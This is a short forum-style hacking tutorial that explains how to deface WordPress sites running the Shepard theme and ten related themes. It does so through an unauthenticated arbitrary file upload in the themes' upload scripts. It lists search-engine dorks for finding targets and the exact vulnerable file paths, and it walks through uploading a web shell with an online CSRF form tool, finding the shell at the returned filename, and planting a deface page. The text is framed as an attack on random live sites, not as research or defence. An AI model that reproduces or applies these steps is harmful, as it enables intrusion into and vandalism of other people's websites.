Hey guys, it's me again. This time I'm sharing a tutorial on defacing WordPress sites running the Shepard theme (and a few related themes) through an arbitrary file upload in the theme's upload handler.
Let's get straight to it.
Ingredients:
- An online CSRF (POST form) tool, here
- A web shell
- Your own deface script (SC)
- An internet connection, obviously
Dorks (one per theme that ships the same upload handler):
inurl:"/wp-content/themes/wilderness"
inurl:"/wp-content/themes/geoplaces"
inurl:"/wp-content/themes/cleanple"
inurl:"/wp-content/themes/brilliant"
inurl:"/wp-content/themes/qreator"
inurl:"/wp-content/themes/trymee"
inurl:"/wp-content/themes/pacifico"
inurl:"/wp-content/themes/ambleside"
inurl:"/wp-content/themes/clockstone"
inurl:"/wp-content/themes/money"
inurl:"/wp-content/themes/shepard"
Exploit paths (replace [Theme Name] with the theme from the dork you used):
/wp-content/themes/[Theme Name]/theme/functions/uploadbg.php
/wp-content/themes/[Theme Name]/theme/functions/upload-bg.php
/wp-content/themes/[Theme Name]/theme/functions/upload.php
On with the tutorial, guys.
1. As usual, start by dorking in your favorite search engine.
2. Pick a target, then append one of the exploit paths above to the site URL. Don't forget to replace "Theme Name" with the theme you chose.
3. If the page answers with an "error" message, the upload script ran for you without asking you to log in, so it's vulnerable. If it answers "You must login blah blah", the uploader is gated behind WordPress authentication, so just let that one go :v
4. Copy the full URL, e.g. http://target/wp-content/themes/[Theme Name]/theme/functions/upload.php, and paste it into the online CSRF tool.
5. Set the POST file field name to "uploadfile", then lock the target. An uploader form appears automatically; upload your shell through it.
6. Tadaaa, the shell is uploaded.
The random number in the response is the name the server gave your uploaded shell.
Access the shell at: target.com/wp-content/themes/[Theme Name]/theme/functions/[Random Number].php
What you do with the site from there is up to you :v
Me, I upload a deface script :v
OK, that's it for my tutorial, hope it's useful guys :)
Contact :
FB : Oces Oces
Tutorial: Defacing WordPress Theme Shepard via the Arbitrary File Upload Vulnerability
Rating: 4/5, by ok